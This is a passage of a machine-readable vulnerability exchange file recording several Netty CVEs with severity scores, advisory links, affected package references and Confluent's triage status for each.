              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#a6dda7b8-bee7-4699-b5eb-4dbfd2e27a33"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ccdea142-c987-46b0-a500-80245e8d3353"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#9891c74e-8c42-4d8d-9f5d-c937b8aa094e"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#a3e2ef75-d373-4a00-abd9-16b9bdc4df0d"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#e739401c-55fd-4cea-9185-4c0c5a565c5e"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#e2cf0b31-62eb-4221-99d8-dd669328b3b2"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e52fcda9-05ae-44b9-8434-f1fbe66993c1"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#d62b2f68-e90f-433c-b79f-93e2389345d8"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#db8dac45-f35d-4c9e-87ea-6ed38104a0f5"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#bd037544-bc38-49ef-808c-cb1993f0954d"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#b5802477-4d15-40e0-add2-9a3a270a3a98"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#c52b1f9a-bbb2-44f7-86a6-78160ce4cb83"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#b9f12a12-ef02-429f-b9f1-9cd4effffe83"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-redis@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#b0f5d16b-6696-48cd-9cad-6e92dd8183c2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-56819",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        401
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, a remote unauthenticated peer can leak one direct `ByteBuf` per HTTP/2 `DATA` frame in applications that enable HTTP/2 content decompression via `DelegatingDecompressorFrameListener`. When a `DATA` frame is processed for a stream whose decompressor has already been closed, `Http2Decompressor.decompress(...)` calls `decompressor.writeInbound(data.retain())` and does not release the retained buffer on the error path, eventually exhausting direct memory and crashing the JVM. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http2 to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56819"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56819"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003bhttps://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-93wv-jw9v-4972"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56819"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56819"
        }
      ],
      "published": "2026-07-21T23:17:52+00:00",
      "updated": "2026-07-30T14:46:35+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http2@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#07d93b67-552f-4119-9c65-d6cdd9e789b2"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#5f03ab22-e65e-4a62-b1da-61973b033895"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ffded10c-b959-42a1-a1ba-cb17ec729467"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#ba8adc44-56ff-4758-95b7-46c78c0be50d"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#db8e300f-5ea2-4259-8358-9470c7947c8b"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#e775d419-0e29-4bf9-8d00-d98ef0f7b8b1"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#e51c59a1-a852-46c1-b00a-b51cf9fd41dc"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#fddca967-93e3-4022-8272-5057a809f325"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#b9f1958e-5c9a-4e46-87d4-2c21c6b5296a"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f09dc5a9-2ec0-4a0d-8ff4-40320a996a82"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e9f83c7b-c907-41f5-b7ad-fc80b7aabcd8"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#e9246126-9d9c-4bfc-8697-aa049821f301"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#f2d25672-6a7d-45ee-8ef5-fd3583977ba2"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/io.netty/netty-codec-http2@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#90655021-3c64-48a7-a02e-b9a7624c48ea"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-56820",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 9.1,
          "severity": "critical",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and prior to 4.1.135.Final, `OcspClient` does not validate that the `CertificateID` in an OCSP response matches the requested `CertificateID`, which can lead to replay attack. `OcspClient.validateResponse` accepts a legitimately signed `GOOD` status response for an unrelated certificate issued by the same CA, allowing bypass of revocation checks for another certificate. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-handler-ssl-ocsp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56820"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56820"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-272m-gcwp-mpwg"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56820"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56820"
        }
      ],
      "published": "2026-07-21T23:17:52+00:00",
      "updated": "2026-07-30T14:48:49+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#b4258755-ea6e-4b52-8b3b-57af51d72cad"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#d90cecaa-6615-4908-af72-d2e04414c725"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#b6f47242-90c2-4f38-96b5-bd34f2080717"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#b76e7e94-6277-4012-9a05-3727bc4f09eb"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#dc321d3e-7b51-4718-9ded-beb529ec076a"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#c4f7f85b-3632-45a7-841c-1487cc4f152e"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f4324b96-e84c-483c-a724-0ce630465706"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#737d76f2-50da-4e8d-9518-6888bc645dc8"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#c38b08d8-fd7b-4d1d-8de7-7c6269a5f72e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f9fb6a82-9354-4037-80ee-92e30a5abff3"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f2602982-edc6-417e-bcf6-0221639c5c69"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f406cd10-5410-458f-975f-d4e41ea97bec"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c1bb2387-62be-4e7e-8655-fea9bca0c7c7"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#5eb89b3c-2970-4494-8605-2f907210558d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only CP repo carrying this package, ce-kafka, never instantiates the affected OCSP client class."
      }
    },
    {
      "id": "CVE-2026-56821",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        299
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, the OcspServerCertificateValidator flags an out-of-date OCSP response but does not stop processing it, so an expired GOOD response is still reported as VALID, letting an on-path attacker replay a stale GOOD response to bypass revocation of a since-revoked certificate. Exploitation can lead to certificate revocation bypass via replay of an expired OCSP response. Any application using OcspServerCertificateValidator is affected; a revoked certificate can be accepted. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-handler-ssl-ocsp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56821"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56821"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-g7hg-vrcf-mvmr"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56821"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56821"
        }
      ],
      "published": "2026-07-29T00:16:38+00:00",
      "updated": "2026-08-07T15:05:53+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#b4258755-ea6e-4b52-8b3b-57af51d72cad"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#d90cecaa-6615-4908-af72-d2e04414c725"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#b6f47242-90c2-4f38-96b5-bd34f2080717"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#b76e7e94-6277-4012-9a05-3727bc4f09eb"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#dc321d3e-7b51-4718-9ded-beb529ec076a"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#c4f7f85b-3632-45a7-841c-1487cc4f152e"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f4324b96-e84c-483c-a724-0ce630465706"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#737d76f2-50da-4e8d-9518-6888bc645dc8"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#c38b08d8-fd7b-4d1d-8de7-7c6269a5f72e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f9fb6a82-9354-4037-80ee-92e30a5abff3"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f2602982-edc6-417e-bcf6-0221639c5c69"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f406cd10-5410-458f-975f-d4e41ea97bec"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c1bb2387-62be-4e7e-8655-fea9bca0c7c7"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#5eb89b3c-2970-4494-8605-2f907210558d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only CP repo carrying this package, ce-kafka, never instantiates the affected OCSP validator class."
      }
    },
    {
      "id": "CVE-2026-56822",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        }
      ],
      "cwes": [
        367
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, the OcspServerCertificateValidator forwards the SslHandshakeCompletionEvent before the asynchronous OCSP validation completes. This allows the client's downstream handlers to send sensitive application data (e.g., HTTP requests) to a revoked server before the channel is closed by the OCSP check. n io.netty.handler.ssl.ocsp.OcspServerCertificateValidator#userEventTriggered, when an SslHandshakeCompletionEvent is received, the validator immediately calls ctx.fireUserEventTriggered(evt). It then initiates an asynchronous OCSP query using OcspClient.query. Because the handshake completion event is forwarded immediately, downstream handlers in the client's pipeline are notified that the TLS handshake is successful. They may then begin reading and processing incoming application data or sending outgoing data. If the OCSP response later indicates the server's certificate is REVOKED, the validator closes the channel, but by this time, the client may have already leaked sensitive data to a revoked server or processed malicious responses from it. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-handler-ssl-ocsp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56822"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56822"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-wc96-39fc-566f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56822"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56822"
        }
      ],
      "published": "2026-07-29T00:16:38+00:00",
      "updated": "2026-08-07T15:05:31+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#b4258755-ea6e-4b52-8b3b-57af51d72cad"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#d90cecaa-6615-4908-af72-d2e04414c725"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#b6f47242-90c2-4f38-96b5-bd34f2080717"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#b76e7e94-6277-4012-9a05-3727bc4f09eb"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#dc321d3e-7b51-4718-9ded-beb529ec076a"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#c4f7f85b-3632-45a7-841c-1487cc4f152e"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f4324b96-e84c-483c-a724-0ce630465706"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#737d76f2-50da-4e8d-9518-6888bc645dc8"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#c38b08d8-fd7b-4d1d-8de7-7c6269a5f72e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f9fb6a82-9354-4037-80ee-92e30a5abff3"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f2602982-edc6-417e-bcf6-0221639c5c69"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f406cd10-5410-458f-975f-d4e41ea97bec"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c1bb2387-62be-4e7e-8655-fea9bca0c7c7"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-handler-ssl-ocsp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#5eb89b3c-2970-4494-8605-2f907210558d"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. The only CP repo carrying this package, ce-kafka, never instantiates the affected OCSP validator class."
      }
    },
    {
      "id": "CVE-2026-59898",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        444
      ],
      "description": "Netty is an asynchronous, event-driven network application framework.  Prior to versions 4.1.136.Final and 4.2.16.Final, ab attacker can force WebSocket upgrade via the lax V07 (or V08) handshaker by sending `Sec-WebSocket-Version: 7` and omitting `Connection: Upgrade` / `Upgrade: websocket` headers, completing a protocol switch that a proxy would not recognize as an Upgrade request and enabling HTTP request smuggling / protocol-confusion attacks. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59898"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59898"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-4mp9-239f-g9hg"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59898"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59898"
        }
      ],
      "published": "2026-07-29T19:16:48+00:00",
      "updated": "2026-08-06T20:35:23+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
